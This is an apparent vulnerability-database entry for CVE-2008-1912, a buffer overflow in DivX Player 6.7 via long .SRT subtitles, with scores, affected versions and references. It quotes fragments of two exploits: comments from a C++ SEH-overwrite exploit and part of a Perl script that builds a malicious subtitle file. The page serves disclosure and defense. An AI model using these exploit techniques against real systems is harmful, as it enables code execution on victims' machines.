CVE-2008-1912
published 2008-04-22CVE-2008-1912: Stack-based buffer overflow in DivX Player 6.7 build 6.7.0.22 and earlier allows user-assisted remote attackers to cause a denial of service (application…
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
11.73%
95.5th percentile
Stack-based buffer overflow in DivX Player 6.7 build 6.7.0.22 and earlier allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long subtitle in a .SRT file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| divx | divx_player | <= 6.7 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow
exploitdb·2008-04-24
CVE-2008-1912 DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow
DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow
---
// Exploit.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
/***********************************************************************
DivX Player <=6.7 srt subtitle parsing exploit
Coded by [email protected]
Tested on Windows XP SP2 + DivX Player 6.7.0
Credit to securfrog for his PoC
Actually this exploit is not relevant to DivX 6.6.0 exploit already posted in milw0rm,since the
technique is quite different and that exploit is no use for DivX 6.7
One of the biggest problem is shellcode being converted to unicode (so it has unwanted null byte )
also the return address,or seh handler has the null byte too
Another quite touch problem is address of SEH structure(at FS:[0]) is rewritten at
Exploit-DB
DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)
exploitdb·2008-04-15
CVE-2008-1912 DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)
DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)
---
# DIVX Player >$file") or die "Cannot open $file: $!";
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;
close($file);
print "$file has been created \n";
# milw0rm.com [2008-04-15]
No writeups or analysis indexed.
http://secunia.com/advisories/29780http://www.securityfocus.com/archive/1/490898/100/0/threadedhttp://www.securityfocus.com/bid/28799http://www.securitytracker.com/id?1019921http://www.vupen.com/english/advisories/2008/1235/referenceshttps://www.exploit-db.com/exploits/5453https://www.exploit-db.com/exploits/5492http://secunia.com/advisories/29780http://www.securityfocus.com/archive/1/490898/100/0/threadedhttp://www.securityfocus.com/bid/28799http://www.securitytracker.com/id?1019921http://www.vupen.com/english/advisories/2008/1235/referenceshttps://www.exploit-db.com/exploits/5453https://www.exploit-db.com/exploits/5492
2008-04-22
Published